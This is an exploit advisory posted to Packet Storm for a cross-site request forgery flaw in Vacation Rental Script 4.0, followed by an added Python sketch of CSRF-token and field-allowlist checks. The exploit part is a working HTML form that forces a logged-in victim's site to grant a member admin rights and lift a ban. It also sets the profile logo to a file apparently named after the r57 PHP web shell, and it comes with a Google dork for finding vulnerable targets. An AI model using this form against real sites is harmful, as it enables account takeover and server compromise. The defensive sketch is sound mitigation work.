Vacation Rental Script 4.0 Cross Site Request Forgery

2010-12-25T00:00:00
ID PACKETSTORM:97012
Type packetstorm
Reporter OnurTURKESHAN
Modified 2010-12-25T00:00:00

Description

`# Exploit Title: Vacation Rental Script v4.0 XSRF VULNERABILITY  
  
# Google Dork: "2006 - 2009 Vacation Rental Script"  
  
# Date: 24.12.2010  
  
# Author: OnurTURKESHAN  
  
# Software Link: http://www.vacationrentalscript.com/  
  
# Version: v.4.0  
  
# Tested on: v4.0 TEsted +WorKs  
#ResPecT My FrienDz : BARC0D3-SZE-BlackApple-Fl0rix-Sky_Lab-Ufuq-VoLqaN-KaBaDaYı-BraveHeart-CWScriptKiddiE-FinishedLife AND ALL MY FRIENDZ  
---------------------------------------------  
<form id="users_edit" method="post" action="http://SİTE.COM/home/members/profile/edit/MEMBERİD" enctype="multipart/form-data">  
<input type="hidden" name="profile_logo" id="profile_logo" value="r57.php-2.jpeg" />  
<input type="hidden" name="role" id="role" value="admin" />  
<input type="hidden" name="banned" id="banned" value="0" />  
<input class="text" type="text" id="user_name" name="user_name" value="USERNAME" />  
<input class="text" type="text" id="email" name="email" value="MAIL@MAIL.COM" />  
<input class="text" type="password" id="password" name="password" />  
<input class="text" type="password" id="retype_password" name="retype_password" />  
<input class="btn-orange" type="submit" value="Save profile" id="submit" name="submit" /><div class="btn-orange-end"> </div>  
  
</form>  
  
www.myfreshdate.com / www.onurturkeshan.com / www.cyber-warrior.org  
  
  
`
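The form above posts `role` and `banned` as hidden inputs and carries no anti-CSRF token field. The sketch below is an added, framework-neutral example of the server-side checks that reject such a request. It is not code from Vacation Rental Script or from the advisory's author. The `csrf_token` field name, the session layout, the key handling and the treatment of `profile_logo` are assumptions.

```python
import hashlib
import hmac
import secrets

# Fields a member may change on their own profile (names from the form above).
SELF_EDITABLE = {"user_name", "email", "password", "retype_password"}
# Fields the form above also posts as hidden inputs; admin sessions only.
PRIVILEGED = {"role", "banned"}
# profile_logo is accepted from nobody here: assumption that the upload
# handler, not a client-supplied string, decides the stored file name.

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-deployment secret


def issue_csrf_token(session_id: str) -> str:
    """Session-bound token the genuine edit page embeds as a hidden field."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def filter_profile_update(session: dict, post: dict) -> dict:
    """Return the fields that may be applied; raise PermissionError otherwise."""
    expected = issue_csrf_token(session["id"]).encode()
    supplied = str(post.get("csrf_token", "")).encode()
    # Constant-time compare; a form hosted on another site cannot know the token.
    if not hmac.compare_digest(expected, supplied):
        raise PermissionError("missing or invalid CSRF token")
    allowed = set(SELF_EDITABLE)
    if session.get("role") == "admin":
        allowed |= PRIVILEGED
    # Allowlist instead of trusting whatever hidden inputs arrive.
    return {k: v for k, v in post.items() if k in allowed}


if __name__ == "__main__":
    member = {"id": "constructed-session-1", "role": "member"}  # constructed
    forged = {"role": "admin", "banned": "0", "profile_logo": "x.jpeg",
              "user_name": "USERNAME", "email": "MAIL@MAIL.COM"}
    try:
        filter_profile_update(member, forged)
    except PermissionError as exc:
        print("cross-site post rejected:", exc)
    genuine = dict(forged, csrf_token=issue_csrf_token(member["id"]))
    print("applied for member:", filter_profile_update(member, genuine))
```

Setting `SameSite` on the session cookie complements the token check but does not replace the field allowlist, which also stops a logged-in member from posting `role` directly.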